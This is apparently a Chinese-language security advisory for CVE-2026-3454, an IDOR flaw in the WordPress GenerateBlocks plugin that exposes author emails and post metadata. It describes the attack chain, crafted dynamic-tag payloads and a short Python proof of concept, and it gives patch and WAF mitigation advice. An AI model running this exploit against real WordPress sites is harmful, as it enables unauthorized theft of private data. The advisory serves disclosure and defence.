CVE-2026-3454 CVSS 6.5 中危

CVE-2026-3454 WordPress GenerateBlocks插件IDOR漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3454

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress GenerateBlocks Plugin

漏洞概述

WordPress GenerateBlocks插件在2.2.0及之前的所有版本中存在不安全的直接对象引用（IDOR）漏洞。由于`/wp-json/generateblocks/v1/dynamic-tag-replacements` REST API端点缺少对象级别的授权检查，仅验证用户是否具有`edit_posts`权限，未验证用户是否有权访问特定文章或数据。这导致拥有Contributor及以上权限的认证攻击者能够通过构造特定的动态标签Payload，提取任意文章的敏感信息，包括作者电子邮件地址和非受保护的文章元数据。

技术细节

该漏洞源于插件在处理动态标签时的访问控制逻辑缺陷。受影响端点`/wp-json/generateblocks/v1/dynamic-tag-replacements`用于解析包含动态标签的内容，例如`{{post_meta id:123|key:_secret_key}}`。虽然插件检查了用户是否具备`edit_posts`能力，但它没有验证请求中的`id`参数所指向的文章是否属于当前用户或用户是否有权读取该特定文章的元数据。攻击者只需拥有 Contributor 权限，即可在请求中通过修改动态标签的`id`参数指向任意目标文章ID。服务器端在解析时直接调用数据库查询该ID的元数据并返回，从而绕过了WordPress标准的对象访问控制机制，导致信息泄露。

攻击链分析

STEP 1

1. 权限获取

攻击者注册或获取一个具有Contributor（投稿者）及以上权限的WordPress账户。

STEP 2

2. 信息收集

攻击者确定想要窃取信息的目标文章ID（通常为整数，如1, 2等）以及想要获取的元数据键名（如meta_key）。

STEP 3

3. 构造Payload

攻击者构造特定的动态标签字符串，例如`{{post_title id:1|link:author_email}}`用于获取作者邮箱，或`{{post_meta id:1|key:secret_key}}`用于获取自定义字段。

STEP 4

4. 发送请求

攻击者向`/wp-json/generateblocks/v1/dynamic-tag-replacements`端点发送包含恶意Payload的POST请求。

STEP 5

5. 数据泄露

服务器端解析标签，忽略了对目标文章ID的权限验证，直接返回敏感信息给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://example.com/wp-json/generateblocks/v1/dynamic-tag-replacements"
username = "attacker"
password = "password"

# Authenticate and get cookies (simplified for PoC)
session = requests.Session()
login_payload = {"log": username, "pwd": password, "redirect_to": "", "testcookie": "1"}
session.post("https://example.com/wp-login.php", data=login_payload)

# Malicious payload to extract author email from post ID 1
# We can also extract post_meta using {{post_meta id:<target_id>|key:<meta_key>}}
payload_content = "{{post_title id:1|link:author_email}}"

headers = {"Content-Type": "application/json"}
data = {"content": payload_content}

response = session.post(target_url, json=data, headers=headers)

if response.status_code == 200:
    print("[+] Exploit successful!")
    print(f"[+] Leaked Data: {response.text}")
else:
    print("[-] Exploit failed.")

影响范围

GenerateBlocks <= 2.2.0

防御指南

临时缓解措施

建议立即将GenerateBlocks插件更新至最新版本以修复此漏洞。如果暂时无法更新，应禁用该插件或通过WAF（Web应用防火墙）规则拦截针对`/wp-json/generateblocks/v1/dynamic-tag-replacements`端点的包含`{{`特殊字符的请求，并严格限制Contributor级别用户的登录权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表